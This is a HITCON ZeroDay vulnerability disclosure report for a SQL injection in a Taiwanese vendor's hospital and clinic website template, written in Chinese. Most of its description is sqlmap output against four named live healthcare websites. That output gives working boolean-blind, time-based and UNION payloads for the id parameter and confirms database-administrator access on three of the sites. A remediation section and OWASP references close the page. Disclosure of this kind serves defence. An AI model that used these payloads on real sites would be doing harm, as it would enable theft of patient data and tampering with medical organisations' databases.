易透網資訊開發有限公司医院模板通用型SQL注入

Vulnerability Overview

ZDID: ZD-2022-00852
發信 Vendor: 易透網資訊開發有限公司
Title: 易透網資訊開發有限公司医院模板通用型SQL注入
Introduction: 通用型SQL注入

處理狀態

目前狀態

公開

Last Update : 2022/12/10

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2022/10/10 11:44:34 : 新提交 (由 Cra5h 更新此狀態)
2022/10/12 22:39:22 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/19 17:45:01 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/19 17:45:01 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/19 17:45:01 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/12/10 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2022-00852
通報者：cra5h (Cra5h)
風險：嚴重
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

易透網資訊開發有限公司开发的醫院/診所/養護中心网站模板存在通用型SQL注入问题，该模板health_area_detail.php?id=XXX路径下id参数存在SQL漏洞，导致数据库易受攻击。

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=155 AND 1494=1494

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: id=-7261 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x576a55506253456a6867546f745143684b706e4776734159784670564e42544a4c6c475376734178,0x717a786a71),NULL,NULL-- -

[11:33:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[11:33:47] [INFO] testing if current user is DBA
[11:33:47] [INFO] fetching current user
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.chien-yu.com.tw:80 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.chien-yu.com.tw:80 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.chien-yu.com.tw:80 ... OK
current user is DBA: True
[11:33:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.chien-yu.com.tw'

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 5622=5622

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 3899 FROM (SELECT(SLEEP(5)))CNPM)

Type: UNION query
Title: Generic UNION query (NULL) - 32 columns
Payload: id=-7311 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707a71,0x4b55544d7a51454c51776a496b594a75686c7a4f6c675a436777484a724a4f5543646e425a6f6e50,0x7162786a71),NULL,NULL,NULL,NULL-- -

[11:14:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[11:14:21] [INFO] testing if current user is DBA
[11:14:21] [INFO] fetching current user
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.tsyr-yu.com.tw:80 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.tsyr-yu.com.tw:80 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.tsyr-yu.com.tw:80 ... OK
current user is DBA: True
[11:14:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.tsyr-yu.com.tw'

Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1738 AND (SELECT 5697 FROM (SELECT(SLEEP(5)))UTZh)

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: id=-8637 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7071,0x6f7547445149654c67786d7a6647546d624f6657477a69464c4a5a484d7077767441776b54594359,0x717a787071),NULL,NULL,NULL,NULL-- -

[11:12:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:12:36] [INFO] testing if current user is DBA
[11:12:36] [INFO] fetching current user
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.jiannren.org.tw:443 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.jiannren.org.tw:443 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.jiannren.org.tw:443 ... OK
current user is DBA: True
[11:12:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.jiannren.org.tw'

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=141 AND 9498=9498

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=141 AND (SELECT 6429 FROM (SELECT(SLEEP(5)))MRjm)

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: id=-3590 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x6365787467455178594577416d4268634c4555465465526d4f4e634571536645584546796a747464,0x716b626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

[11:31:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat
web application technology: PHP 5.4.16, Apache 2.4.6
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:31:40] [INFO] testing if current user is DBA
[11:31:40] [INFO] fetching current user
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.thop.org.tw:80 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.thop.org.tw:80 ... OK
[proxychains] Dynamic chain ... 192.168.1.7:7890 ... www.thop.org.tw:80 ... OK
current user is DBA: False
[11:31:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/www.thop.org.tw'

修補建議

参数化查询。
过滤特殊字符。
打开magic_quotes_gpc，如果magic_quotes_gpc=Off，则使用addslashes()函数。

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

易透網資訊開發有限公司医院模板通用型SQL注入 - HITCON ZeroDay

Vulnerability Detail Report